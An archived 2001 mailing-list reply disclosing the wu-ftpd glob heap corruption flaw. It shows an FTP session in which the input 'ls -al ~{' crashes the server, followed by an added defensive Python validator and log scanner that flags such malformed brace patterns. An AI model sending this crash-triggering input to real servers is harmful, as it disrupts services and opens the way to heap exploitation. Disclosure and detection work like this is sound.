Re: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability

From: gobaat_private
Date: Sun Dec 02 2001 - 08:07:34 PST


    On Fri, 30 Nov 2001, Hasan Azam Diwan wrote:
    
    > Darwin's ftpd is not vulnerable... the "ls ~{" command returns a list of ~root.
    > 
    
    
    [teste@XXX teste]$ ftp test.somehost.com
    Connected to test.somehost.com.
    220 Test.somehost.com FTP server (Version wu-2.6.1-16.7x.1) ready.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    KERBEROS_V4 rejected as an authentication type
    Name (test:teste): ftp
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230-The response 'baubau' is not valid
    230-Next time please use your e-mail address as your password
    230-        for example: joeat_private
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls ~{
    227 Entering Passive Mode (194,105,27,22,166,166)
    550 Missing }
    ftp> ls -al ~{
    Segmentation fault (core dumped)
    
    As you can see, the problem still exists, even if updates are done.
    Goba
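The session above shows wu-ftpd rejecting `ls ~{` with "550 Missing }" but crashing on `ls -al ~{`, i.e. the same malformed brace pattern reaches a different code path once options are present. The following is an added example, not code from the original post or from wu-ftpd: a defender-side check that validates the brace syntax of a LIST/NLST argument once, after stripping option tokens, so the result does not depend on flags, plus a scanner that runs the same check over constructed command-log lines to surface probes for this class of bug. The log format, the client addresses (RFC 5737 test ranges) and the set of commands treated as glob-bearing are all assumptions made for this example.

```python
"""Validate FTP glob arguments and scan command logs for malformed brace patterns.

Added example (not from the original post or the wu-ftpd project). The
log line format "<timestamp> <client-ip> <COMMAND> [args...]" and the
sample entries are constructed for this demonstration.
"""
from typing import List, Optional, Tuple

# Commands whose argument is handed to a glob routine. Assumption for this
# example; adjust to the server actually deployed.
GLOB_COMMANDS = {"LIST", "NLST", "STAT"}


def brace_error(pattern: str) -> Optional[str]:
    """Return a description of the first brace error in PATTERN, or None.

    A backslash escapes the following character (csh-style globbing), so
    "a\\{b" is a literal brace and is accepted.
    """
    depth = 0
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\":
            i += 2  # skip the escaped character entirely
            continue
        if ch == "{":
            depth += 1
        elif ch == "}":
            if depth == 0:
                return "unmatched '}' at offset %d" % i
            depth -= 1
        i += 1
    if depth:
        return "missing '}' (%d unclosed)" % depth
    return None


def extract_pattern(args: str) -> str:
    """Drop option tokens such as '-al' so only the glob pattern is checked."""
    return " ".join(tok for tok in args.split() if not tok.startswith("-"))


def check_list_argument(args: str) -> Tuple[bool, str]:
    """Validate the full argument string of a LIST/NLST/STAT command.

    Returns (accepted, reason). The check runs on the pattern regardless of
    which options precede it, so '-al ~{' and '~{' get the same verdict.
    """
    err = brace_error(extract_pattern(args))
    if err:
        return False, err
    return True, "ok"


def parse_command_line(line: str) -> Optional[Tuple[str, str, str, str]]:
    """Split a constructed log line into (timestamp, client, command, args)."""
    parts = line.split(None, 3)
    if len(parts) < 3:
        return None
    args = parts[3] if len(parts) == 4 else ""
    return parts[0], parts[1], parts[2].upper(), args


def scan_command_log(lines: List[str]) -> List[dict]:
    """Return one record per glob-bearing command whose pattern is malformed."""
    flagged = []
    for n, line in enumerate(lines, 1):
        parsed = parse_command_line(line)
        if parsed is None:
            continue
        ts, client, cmd, args = parsed
        if cmd not in GLOB_COMMANDS:
            continue
        ok, reason = check_list_argument(args)
        if not ok:
            flagged.append({"line": n, "time": ts, "client": client,
                            "command": cmd, "args": args, "reason": reason})
    return flagged


# Constructed sample log: two probes with the pattern from the session above,
# one nested-but-unclosed pattern, and well-formed or escaped patterns that
# must not be flagged.
SAMPLE_LOG = """\
2001-11-30T12:00:01 192.0.2.10 LIST -al pub
2001-11-30T12:00:02 192.0.2.10 LIST ~{
2001-11-30T12:00:03 192.0.2.10 LIST -al ~{
2001-11-30T12:00:04 198.51.100.7 NLST {a,b}.txt
2001-11-30T12:00:05 198.51.100.7 NLST a\\{b
2001-11-30T12:00:06 198.51.100.7 RETR pub/file}.txt
2001-11-30T12:00:07 198.51.100.7 LIST {a,{b,c}
"""

if __name__ == "__main__":
    for rec in scan_command_log(SAMPLE_LOG.splitlines()):
        print("line %(line)d %(client)s %(command)s %(args)r: %(reason)s" % rec)
```

The scanner deliberately ignores RETR, since that command is not in the assumed glob-bearing set; widen `GLOB_COMMANDS` if the server in question expands patterns for more commands.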
    



    This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 21:01:11 PST